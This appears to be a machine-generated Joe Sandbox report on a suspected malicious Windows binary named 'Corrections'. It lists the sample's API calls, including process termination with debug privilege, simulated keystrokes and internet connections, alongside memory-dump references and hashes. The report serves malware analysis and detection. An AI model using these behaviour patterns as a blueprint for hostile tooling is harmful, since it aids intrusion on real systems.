                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f9556446bfa3d49902c02895b2eccce6698f58de0c0b8ee5e5038a3b2c7bb182
                                                                                                                                                                                                                                                                                            • Instruction ID: 90976f4f1d5506689a3fd8fbeb96c5b7cb32f7582ba4b940bba1ebded8cb7d25
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9556446bfa3d49902c02895b2eccce6698f58de0c0b8ee5e5038a3b2c7bb182
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACC1583990465AEFDB10CFA8C580BEDFBB5FF08314F14851AE8A5E3254D738A941DBA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 30040b3c28a31fb5fc4b21742e548453d1359adf0a9dd4d4da162dea11db41f6
                                                                                                                                                                                                                                                                                            • Instruction ID: f7b543514267564283d34292bf36fdc10a8277e458c1b4ff518453915aa06261
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30040b3c28a31fb5fc4b21742e548453d1359adf0a9dd4d4da162dea11db41f6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8612671906301AFDB31EF7BD881BBE7BA8AF42326F14056EED54A7281D6319848C791
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 009B5C24
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 009B5C65
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 009B5C6B
                                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 009B5C6F
                                                                                                                                                                                                                                                                                              • Part of subcall function 009B79F2: DeleteObject.GDI32(00000000), ref: 009B7A1E
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B5CAB
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B5CB8
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009B5CEB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 009B5D25
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 009B5D34
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a1e0df4fff9f8719b04b1c8ea6843b1d02f17d4eabc1e9c47d7ab6f3d56355bb
                                                                                                                                                                                                                                                                                            • Instruction ID: 8a4d3540acf137c59c93a2deb71b7f48749c9d54d55c89a46b3773ab8583683c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1e0df4fff9f8719b04b1c8ea6843b1d02f17d4eabc1e9c47d7ab6f3d56355bb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D651D230A51B18BFEF249F24CE4AFD83BAAFB44770F158215F6249A1E1C775A990DB40
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009628D1
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009628EA
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009628FA
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00962912
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00962933
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00962942
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0096295F
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009211F5,00000000,00000000,00000000,000000FF,00000000), ref: 0096296E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c2af5e1f3f37eab132473c244089faad8c211db23c311d9971ddf0d22b0d7201
                                                                                                                                                                                                                                                                                            • Instruction ID: 435185e902a68dd79e3759b5223b7d9c074ccb8e06977b53a299a1691c326890
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2af5e1f3f37eab132473c244089faad8c211db23c311d9971ddf0d22b0d7201
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16519C30610609AFDB24DF24DD45BAA7BB9FF98720F204618F946972E0D770E990EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0099CBC7
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0099CBDA
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0099CBEE
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0099CCB7
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099CC98: GetLastError.KERNEL32 ref: 0099CD67
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099CC98: SetEvent.KERNEL32(?), ref: 0099CD7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099CC98: InternetCloseHandle.WININET(00000000), ref: 0099CD86
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e528767d1794be1f88783e8aa351dcd25de3d1b66e0557d7ddb81980114f9400
                                                                                                                                                                                                                                                                                            • Instruction ID: a6d92831a49d6760fc2b737c2f1a87f07db4fd3719130edc7d200b3298429c9a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e528767d1794be1f88783e8aa351dcd25de3d1b66e0557d7ddb81980114f9400
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2318BB1505705AFDF219F69CE84A6ABBE8FF04310B04492DF89A92610EB30E814EB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F0A
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00982F28
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00982F2C
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F36
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00982F4E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00982F52
                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00982F5C
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00982F70
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00982F74
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a189bb291281f9bd89aeb2c2e11743f3c3741348ab0d2752a96179b5634b35dd
                                                                                                                                                                                                                                                                                            • Instruction ID: 2ef7d888195d5a2b4773a274bbe15bffd092617eb0b95eb0802f0283306a9884
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a189bb291281f9bd89aeb2c2e11743f3c3741348ab0d2752a96179b5634b35dd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B901D470798210BBFB107769DC8EF593F5ADF8EB21F100012F318AE1E0C9E26444DAA9
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00981D95,?,?,00000000), ref: 00982159
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 00982160
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00981D95,?,?,00000000), ref: 00982175
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00981D95,?,?,00000000), ref: 0098217D
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 00982180
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00981D95,?,?,00000000), ref: 00982190
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00981D95,00000000,?,00981D95,?,?,00000000), ref: 00982198
                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00981D95,?,?,00000000), ref: 0098219B
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,009821C1,00000000,00000000,00000000), ref: 009821B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca5239c9a2f229ffd115ee253b7d386e85a37abfd2cf3dc87cba614b33f9e079
                                                                                                                                                                                                                                                                                            • Instruction ID: 9f53984385414891343b3d441a74047066dd86d8609e2ed19ab0fff43e4139da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca5239c9a2f229ffd115ee253b7d386e85a37abfd2cf3dc87cba614b33f9e079
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB01CDB5259304BFE710AFA9DD8DF6B7BACEB88715F004511FA05DB2A1DA709800DB30
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0098DDAC
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0098DDBA
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DD87: CloseHandle.KERNEL32(00000000), ref: 0098DE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AABCA
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009AABDD
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009AAC10
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 009AACC5
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 009AACD0
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009AAD21
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                            • Opcode ID: e15b277493bd52b6e3f624b95abbe3d5cf35107b12d52f95685f2cd06dafa45b
                                                                                                                                                                                                                                                                                            • Instruction ID: 21941cb04dcc4a67931da2970fbdb537218679f050d9188e09164d1004b205d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e15b277493bd52b6e3f624b95abbe3d5cf35107b12d52f95685f2cd06dafa45b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D561BD70208242AFE310DF14C484F26BBE5AF95318F18849CE4A68BBA3C775EC45CBD2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009B43C1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009B43D6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009B43F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B4435
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 009B4462
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 009B4490
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                            • Opcode ID: 72ed4bc66752334f1817490e1cfeb8c8e459dd1e040b7d028bffeb1c9fa3dd4a
                                                                                                                                                                                                                                                                                            • Instruction ID: 57d5f0a86d2213c01951241bdc8a912527e850f4381f6e73c7695ce80a23a15b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72ed4bc66752334f1817490e1cfeb8c8e459dd1e040b7d028bffeb1c9fa3dd4a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B741E171A00318ABDF219F64CD49FEA7BE9FF48360F14052AF944E7292D7709890EB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098C6C4
                                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 0098C6E4
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0098C71A
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(018462D8), ref: 0098C76B
                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(018462D8,?,00000001,00000030), ref: 0098C793
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                            • String ID: 0$2
                                                                                                                                                                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                            • Opcode ID: 54d37d449d3ba651edb5c7e63f4a95ef8a21cb4307858805bfb67c288879844b
                                                                                                                                                                                                                                                                                            • Instruction ID: 925f89f09a8a247fc7d43de4df9adb4be3481db86c3adfae6f202b154f800f4c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54d37d449d3ba651edb5c7e63f4a95ef8a21cb4307858805bfb67c288879844b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3751A0B06002059BDF20EF78D984BAEBBF8EF48314F24466AE911A7391E7749944CF71
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0098D1BE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoad
                                                                                                                                                                                                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                            • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                            • Opcode ID: f62ab9484100bbb886228872c7d629ade1a0d887329da9f8cdf8ce948fceb1c3
                                                                                                                                                                                                                                                                                            • Instruction ID: 12edab07ab2788d5dfb8ef77aab97d5374de91479b41f4fd49b80fb5ca8b5c69
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f62ab9484100bbb886228872c7d629ade1a0d887329da9f8cdf8ce948fceb1c3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3711293564E706BEEB096B55DC86EAE77AC9F05764B20002AF900A63C1E7B9AE404761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
